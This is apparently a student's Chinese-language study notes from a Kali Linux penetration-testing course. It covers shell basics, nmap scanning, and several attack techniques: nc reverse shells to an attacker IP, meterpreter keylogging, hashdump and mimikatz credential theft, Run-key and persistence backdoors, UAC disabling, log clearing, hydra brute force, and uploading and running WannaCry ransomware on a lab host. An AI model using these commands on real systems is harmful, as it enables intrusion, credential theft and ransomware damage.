kali
基本命令
kali liunx
ctrl+alt+f2
切换到控制台
alt+f6
切换到图形界面
lsb_release -a
查看Kali的发行版本
root@kali:~# ip a
查看IP地址
root@kali:~# ip route show
查看网关
root@kali:~# cat /etc/resolv.conf
查看DNS
whoami
查看当前登录用户
sudo su -
提权工具
sudo -k
清除令牌
sudo -l
查看用户权限
ctrl+d 注销
nc 文件传输
输入重定向 <
输出重定向 > (覆盖) ,>>(追加)
seq 1 10 产生一串数字
echo “11”>> f1 追加数字11
echo “11”> f1
cd 改变当前工作目录
用法1:cd 直接回到家目录
cd~ 直接回到家目录
~表示家
用法2:
cd
cd work/exam/ 相对路径,就是以当前目录开始描述的路径,结果如下
~/work/exam#
表示在家目录下的work目录下的exam目录
用法3:
cd /work/exam 绝对路径 , 就是以 /开始描述的路径
pwd 查看当前目录
work
├── app
├── bak
│ └── interfaces
├── doc
├── exam
└── scripts
经典的用法,常用在脚本中对文件的编写,追加
cat << EOF >> hello.sh
echo “Welcome to sdxh”
read -p “Please input your name:” name
echo “your name is $name”
EOF
1.cat hello.sh
2.chmod +x hello.sh
//添加可执行权限
3. ./hello.sh
//运行脚本
read 语句可以从键盘或文件的某一行文本中读入信息,并赋予一个变量
-p 显示提示语句
echo ${显示变量}
set 显示所有变量
4.shell脚本的开头
通常是脚本的第一行一个规范的shell脚本的第一行会指出那个程序来执行
#!/bin/bash
ls -l name.sh //查看文件详细属性
5.执行脚本
1…/name.sh
2.sh name.sh
3./root/work/exam/day01/name.sh
–转义符,使原有特殊含义的字符失去了本身的意义,而成为一个普通字符。
10.7 1.nc传输文件
接收端nc -l -p 2226 >test.sh
发送端nc -nv 192.168.177.129 2226 < nam_01.sh 2226 -q 1
二,查看文件内容
1:cat
2:-n 加行号
3:ls
三,删除文件
rm -rf
-r 递归
-f 不需要确认,强制操作
四,目录切换
cd - 返回到上次切换的目录
cd …
10.8
五,创建多个文件
touch 文件 文件
cp suorce_file(s)destination
cp 源文件 (可以有多个)目标
1.复制一个目录
-R -r --recursive 递归
(1)cp -r cities/ /tmp
(2)ls /tmp 查看
(3)tree -l 2 /tmp 二级目录
2.复制多个目录
(1)
(2)
六,文件的移动(move)
01、命令
mv
移动
重命名
判断是移动还是重命名就看文件的位置有没有发生变化
mv /root/work/exam/day02/copycats.txt /tmp 绝对
mv ~/work/exam/day02/copycats.txt /tmp相对
mv …/day02/copycats.txt /tmp
(2)移动多个文件
mv
02
10.12
echo -e “\033[40;30m内容\033[0m”
七.文件重命名
mv 旧名字 新名字
八.隐藏文件
ls -a ~显示隐藏文件
10.13
九、tar
tar cvf 打包的名 被打打包的文件名
tar cvf hack.tar hack
tar tvf hack.tar
查看包文件
tar xvf 解压包
-c 创建包文件
-x 解压
-v 查看详细信息
-f 指定包文件
-t 查看
-C 指定解压的位置,默认为当前目录
-Linux命令中单个减号表示标准输入输出流
发送端tar cvf - hack | nc -nv 192.168.177.129 2226 -q 1
接收端 nc -l -p 2226 | tar xvf -
十、远程控制
正向连接
外部用户(hacker) 主动连接受害者(会开启一个服务端口)容易受到防火墙拦截
10.14
反向连接(reverse_tcp)
受害者主动连接攻击者(hacker)
是一种出方向的连接(Outbound)
防火墙通常对出出站流量是放行
反弹式
kali nc -l -p 2226
XP nc -nv 192.168.177.77 -e cmd.exe
让Kali成为受害者 nc -l -p 2226 -e /bin/bssh
xp nc -nv 2226
python -c ’ import pty;pty.spawn("/bin/bash")’
-z 常用为端口扫描
XP nc -L -p 2226
Kali nc -nv 192.168.177.111 2226 -e /bin/bash
nc -nvz 192.168.177.129 1-65535
Metasploit-渗透测试界的标准工具,简称MSF。于2003年由HD More 发布第一版,2007年用 ruby 语言编写,一直是安全从业人员中宠儿。现在被安全公司Rapid7收购,Rapid7公司仍然提供其开源版本。
优点:
l 模块化
l 灵活架构 //这种设计有助于人们在发现漏洞之后立刻着手exploit的开发
l 界面友好
l 简单易用
l exploit代码安全(经过严格审查)
开发? 搜索?
smb 协议又称cifs协议,用于文件共享,用到的端口 445,139
back 返回
search 搜索符合条件的特定模块 ms08-067
use 选择一个指定的模块并使其开始工作
Info 列出相关模块的信息
show options 查看选项
set 给某个特停对象赋值
exploit 启动一个渗透模块
sysinfo查看远端的信息
shell
LHOST–本地主机
LPORT–本地端口
RHOSTS-远程主机
RPOST–目标端口
root@kali:~# ls /usr/share/metasploit-framework/modules/ 模块文件的位置
渗透模块(exploit)运行时会利用目标的安全漏洞进行攻击。
攻击载荷模块(payload) 他能帮助我们在目标系统上获得需要的访问和行动权限
meterpreter :meterpreter 是一种使用内存技术的攻击载荷,可以注入到进程之中。
它提供了各种可以在目标上执行的功能,从而成为了最受欢迎的攻击载荷
arp-scan -l 这是使用协议对本地网络(-l)做扫描
nmap -A 192.168.195.77
-A 对目标计算机做综合扫描
1、检测开放的端口和服务
2、目标操作系统的类型
3、脚本扫描
4.对目标做路由跟踪
meterpreter 命令
sysinfo 列出被渗透的系统信息
arp 列出目标主机arp缓存地址的IP地址和Mac地址
background 将一个处于激活状态的会话发送到后台
show sessions 查看后台会话
sessions -i 1 进入会话1
shell 获取一个目标主机的cmdshell
getuid 获取当前用户的细节
getsystem 提升权限,获取系统级权限
getpid 获取meterpreter会话在目标主机上注入进程的进程号
ps 列出目标主机上运行的所有进程
run killav 关闭目标主机的杀毒软件
run scraper 命令查看目标主机的详细信息
ARP协议
地址解析协议
把ip地址解析成mac地址
ctrl shift esc 打开任务管理器
10.16
help workspace
创建工作空间
workspace -a name
back 取消当前选择的模块并且退回到上一级命令的窗口
set payload windows/metrppreter/reverse_tcp
ruan post/windows/gather/checkvm
查看对方是不是虚拟机
screenshot
屏幕截图
上传
download file
下载
upload file
upload root/NC.EXE c:/hacker
10.19
/usr/share/windows-binaeies
keyscan_start
键盘捕获
keyscan_dump
捕获输入的信息
keyscan_stop
停止捕获
migrate
绑定进程
过程
把 meterpreter 会话的进程迁移到一个合法的进程中
1、getpid 查看进程号
2、ps 查看进程列表
3、migrate 绑定进程号
4、keyscan_start
键盘捕获
5、keyscan_dump
捕获输入的信息
6、keyscan_stop
停止捕获
run post/windows/gather/enum_logged_on_users
枚举用户
获取用户密码hash
hashdump
windows账户数据
sam数据库 :存储Windows账号、密码信息的数据库文件
位置%systemroot%\system32\config\sam
load mimikatz模块获取用户密码
mimikatz_command -f sekurlsa::wdigest -a “full”
mimikatz_command -f sekurlsa::searchPassword
获取进程中用户的密码
notepad
打开记事本
10.20
msv
获取用户的hash密码
使用wdiget命令获取登录的用户存储在内存里的明文密码
在Meterpreter中 ,渗透测试者 使用 execute命令在目标系统中执行应用程序。
exexute -f “nc.exe -l -p 2226 -e cmd.exe”
MSF中的指令
sessions -k 会话编号 结束一个会话
kill 杀死进程
unset 取消变量的值
windows 中 netstar -an | find 2226
查看
远程管理Windows操作系统-远程桌面(rdp协议 , 3389端口)
run post /windows/manage/enable_rdp
rdesktop----windows远程桌面客户端工具
可以创建持久后门,这样,只要目标主机开机,将自动与攻击主机自动连接
run persistence -X -i 6 -p 22226 -r 192.168.177.77
-X当系统启动后,自动启动代理
-i:设置每个连接尝试的时间间隔,单位为秒
-p指定Metasploit监听的端口
-r指定反向连接运行MSF 的IP地址 即攻击主机的地址
1、use exploit/multi/handler 模块建立监听
2、set payload windows/meterpreter/reverse_tcp
3、set LHOST 192.168.177.77
4、set LPORT 22226
regedit----打开注册表编辑器 是Windows系统的神经中枢,保护了系统的软硬件的保护信息
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\CamLKy
10.22
清除踪迹 clearev
横向渗透
跳板是指利用一台已经攻击的漏洞主机作为跳板,渗透网络中的主机。
run get_local_subnets
查看目标系统上的子网
并且添加路由条目
route add[子网][掩码][会话ID]
route print 查看添加的路由
load auto_add_route
自动添加路由
ping 使用的icmp协议
icmp 允许主机或路由报告差错情况和提供有关异常情况的报告
arping —二层ping
merasploit中使用的模块
辅助模块 (auxiliary)
ms17-010
nmap --script smb-vuln-ms17-010
ls /use/share/nmap/scripts/
nmap 工具的脚本引擎存储目录
smb-vuln-ms17-010.nse
10.26
启用远程桌面
run post/windows/manage/enable_rdp USERNAME=用户名 PASSWORD=密码
cmd
mstsc— 调用远程桌面
关闭uac功能
uac—用户账户控制 ,阻止一些恶意软件
修改UAC的值
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
修改注册表 ,执行反弹式shell
reg setval -k HKLM\software\microsoft\windows\currentversion\run -v backdoor_nc -d ‘C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe’
L 表示用户退出连接后重新进行端口侦听
d 后台运行
p 指定监听的端口
setval 设置一个注册表的键值
-k 指定键值的路径
-v 指定键值的名字
-d 指定键值的内容
nmap -sV -p 443 192.168.177.66
-sV 探测目标服务的版本信息
-P 指定端口号
msf5 connnect 192.168.177.66 443 连接
mv wcry2.0.zip work/exam
cd work/exam/
ls
unzip wcay2.0.zip
ls
mv ‘wcry2.0勒索.exe’ wcry.exe
upload /root/work/exam/wcry.exe
dir wcry.exe
execute -f wcry.exe
Process 524 created.
10.27
1.nmap -sP 192.168.177.66 arpping 192.168.177.66
探测网络中的有哪些活动主机
2.对目标主机做ping测试
ping不通 ,简单推断,对方主机可能开启防火墙
3.nmap -O 192.168.177.66
探测目标主机的系统类型
upload /usr/share/windows-binaries/nc.exe
上传nc.exe
10.29
ms12-020
searchsploit
根据指定关键字查找相关漏洞利用库
远程桌面又称为Terminal (终端服务)
拒绝服务DoS(Denial of Service)指攻击者向互联网上的某个服务器不停地发送大量分组
使该服务器无法提供正常服务
分布式拒绝服务 DDoS
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
tasklist | find “”
查看进程列表
netsh firewall add portopening TCP 4000 “Permit_RDP_4000” ENABLE ALL
修改防火墙放行3389
MASSCAN
借助于期内部的异步传输机制,可以提供远高于NMAP的扫描速度
-p 指定端口
–rate 指定扫描速度
nmap -sV -p 4000 192.168.177.66
-sV 探测目标服务及其版本
11.2
被动侦察(passive)区分两种模式的主要依据是看是否与目标进行数据包的交互,
主动侦察(active)
netdiscover
arp 嗅探和扫描工具
netdiscover -h 帮助
netdiscover -p 被动模式
netdiscover -i eth0 默认为主动扫描模式
-i 指定接口
-r指定扫描的地址范围
1、nerdiscover -i eth0 -r 192.168.177.0/24
2、nmap -sP 192.168.177.0/24
3、arp-scan -l
扫描本地网络
4、nbtscan 192.168.177.1-254
nmap 概述
nmap 是一个免费的功能强大的网络扫描工具,可以跨平台使用
1、搜集网络资产
2、检查活动主机
3、确定操作系统
4、运行的服务及其版本
5、标识主机漏洞
6、检查是否有嗅探者
7、检查网络中是否有防火墙
nmap的基本用法
nmap -v -A scanme.nmap.org
11.3
nmap -p1-65535 192.168.177.131
nmap -p- 1912.168.177.131
nmap -sV -p 12380,138 192.168.177.131
服务版本检测
ping sweep
快速扫描
-sn:ping Scan -disable port scan
执行ping扫描,不对端口做扫描
如果是同一个网段(本地网络)执行arpping
AWK 最常用于截取文本中某一段数据
-F 用来重新定义字段分隔符,默认的情况下为空
gawk 是一个模式扫描
读取命令行上所指定的各个文件
awk 基本结构包括模式匹配(用于找到要处理的行)和处理过程(即处理动作)
paten
nmap -sn 192.168.177.0/24 | grep report | awk ‘{print $5}’
nmap -sn 192.168.177.100.150
nmap -sn 192.168.177.129 192.168.177.131
nmap -sn -iL ip_stapler.txt
使用-iL 指定扫描的目标来自于一个文件
nmap -A -O -sV 192.168.177.131
-A 综合扫描 -O 操作系统
anonymous (匿名用户)
11.4
路由跟踪:探测数据包所经过的节点
linux平台 traceroute
windows平台 tracert
nmap -Pn
不使用icmp 探测,假定主机在线,直接进行扫描
优点:nmap 可以检测到隐藏的系统,可以逃避防火墙和网络嗅探器的检测
同步SYN 在连接建立时用来同步序号,当SYN-1而ack=0时,表明这是一个连接请求的报文段
1、一个新发起的连接的特征:SYN=1,ack=0,即这是一个连接请求报文。这是三次握手的第一步
2、确认ACK TCP 规定,在连接建立后所有传送的报文段都必须把ACK置为1
3、当三次握手成功完成,就表示连接建立,状态为ESTABLISHED
复位RST 当RST=1时 表明TCP连接中出现严重差错 必须释放连接
RST 置1 还用来拒绝一个非法的报文段
nmap -sS
syn 扫描,又被称为秘密扫描,也是默认扫描的方式,有时也被称为半开连接扫描
nmap -p 22 --reason -v 192.168.177.131
完全连接扫描
-sT 完全建立了三次握手
–reason 告诉我们判断的原因
-v 能够查看详细的信息
基于UDP的服务
DNS(查询) TCP/UDP 53
NTP(网络时间协议)UDP/123
SNMP(简单的网络管协议)UDP/161 UDP/162
TFTP(简单的文件传输协议)UDP/69
-sU:UDP Scan
11.5
Windows 格式转换
convert n: /fs:ntfs
wireshark 技巧
1、显示过滤
ip.addr.eq and ip.addr.eq
只查看 通讯流量
诱饵(欺骗)扫描
nmap -sS -p 端口 目标地址 -D 欺骗地址
nmap -sS -p 80 --spoof-mac 伪造的mac 目标地址
#绕过防火墙#
(1)分片
-f 把数据包分片 默认每个分片大小为八个字节
所传送的数据包产妇的超过数据链路层的MTU 值,就必须把过长的数据包进行分片处理
在IP 层下面的每一种数据链路层协议都规定了一个数据帧中的数据字段的最大长度,这称为最大传送单元MTU
数据字段(Data)是网络层数据,最小长度必须为46字节以保证帧长至少为64字节,数据字段的最大长度为1500
inetmgr–iis 管理控制台
IIS(互联网服务)
–mtu 定义分片的偏移量,一个分片的大小
nmap -p 21 -D RND:10 192.168.177.131
-D RND:10 随机生成10个诱饵
11.06
#nmap --source-port#
更改源端口
winver–看版本
services.msc–服务
端口–传输层
1024的端口称为高位端口,一般客户端使用的端口,动态产生
<1024 常规端口,公用服务所使用的
firewall.cpl 打开防火墙
在检查有状态防火墙时,我们可以在启用ACK标志的情况下发送探针。如果目标没有提供响应,则表示存在防火墙
如果对方有响应,回应一个RST置位的数据包,判定对端没有开启防火墙
nmap -sA -p 80 command
ACK扫描
11.9
#紧急URG 当URG=1时,表明紧急指针字段有效。它告诉系统此报文段中有紧急数据
应尽快传达,而不要按原来的排队顺序来传送
#推送 PSH(PUSH)当两个应用进程进行交互式的通信时,有时在一端的应用希望
在键入一个命令后立即就能够收到对方的响应。
#终止FIN(FINIS, 意思是 完 、终)用来释放一个连接。当FIN=1时表明
此报文段的发送数据已发送完毕,并要求释放运输连接
-sX 圣诞树扫描
URG FIN PSH 被置位
-sF FIN扫描 FIN被置位
-sN 空扫描, 不设任何标志位
nmap NSE
nmap的脚本引擎
1、自动化的执行扫描任务
2、发现目标的漏洞、是否有恶意软件以及后门
3、也可以支持自定义
4、脚本引擎的位置
/usr/share/nmap/scripts
5、扩展名为.nse
分类
all–运行所有的脚本引擎
auth–和认证有关
default–默认的(执行一些基本的脚本)
discovery–获取目标信息
External–利用OSINT(开源信息侦察工具)获取目标信息,如whois
、网络空间搜索引擎、Google hack、shodan、HTTP://www.zoomeye.org/
Intrusive–入侵检查
Malware–恶意软件、后门检查
safe–安全检查
vuln–漏洞扫描
语法;–script 类别
root@kali:~# nmap --script malware 192.168.177.66
-sC
执行默认脚本扫描引擎(类别为default)
ls /usr/share/nmap/scripts/ | wc -l
统计行数
nmap --script smb 192.168.177.131 缩小搜索范围
–script-args
传递脚本里面的参数的,Key1是参数名,该参数对应value1使用逗号连接
11.10
root@kali:~# ls /usr/share/wordlists/
dirb dirbuster fasttrack.txt fern-wifi metasploit nmap.lst rockyou.txt.gz wfuzz
Kali自带的字典文件
gunzip 解压
T0-偏执的,非常慢的扫描,常用于逃避IDS(入侵检测)
T1-鬼祟的,缓慢的扫描,常用于逃避IDS检测
T2-文雅的,降低速度以减少对带宽的占用
T3-普通的,默认的
T4-野蛮的,常用的
T5-疯狂的,快速的,不精确
ftp客户端 get-下载 put-上传
Ctrl+U 网页源码查看
robots协议也叫robots.txt是一种存放于网站根目录下的ACII编码的文本
文件,它通常告诉网络搜索引擎的漫游器(又称网络蜘蛛)此网站中的哪些
内容是不应被搜索引擎的漫游器获取的,哪些是可以被漫游器获取的
CMS–内容管理系统
wordpress–构建个人博客常用的程序(安全评估、漏洞扫描工具)
wappalyzer–web站点分析器(谷歌浏览器的一个插件)
功能
enumerating wordpress version //枚举wordpress版本
//漏洞检测
//列出
//基于字典的密码破解
wpscan --url https://192.168.177.131:12380/blogoblog/ --enumerate
u --disable-tls-checks
–url 指定扫描的网址
–enumerate u 枚举用户
–disable-tls-checks禁用tls
11.11
wappalyzer是一款功能强大的、且非常实用的chrome网站技术分析插件,通过
该插件能够分析目标网站所采用的平台构架、网站环境、服务器配置环境、
javascrript框架
Nikto
开源的web扫描工具
可以对web服务器做目录遍历及问题检查(是否有漏洞)
-host 指定扫描的主机(URL)
-nossl不使用SSL
-o 指定输出的文件(可以把扫描的结果输出到指定文件)
phpmyadmin–一个mysql()
Information gathering via shares(共享)
共享服务,使用smb(服务器消息块)协议
用到的445,139端口
工具;enum41linux
用于枚举windows和Samba主机的数据
11.12
awk -F “\” ‘{print $2}’ share.txt | awk ‘{print $1}’ >>stapler_user.txt
hydra是黑客组织thc的一款开源密码攻击工具
用于用户登录口令破解工具,支持多种登录协议
-e nsr
n//空口令
s//用户名和密码一样
r//登录密码和用户名相反
-l 登录用户名
-L 登录用户名文件
-P 指定字典(口令)文件
-t 同时运行的任务数 默认是16个
hydra -e nsr -L stapler_user.txt 192.168.177.131 ftp
hydra -e nsr -L stapler_user.txt 192.168.177.131 ssh -t 4
https://www.exploit-db.com/
109
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
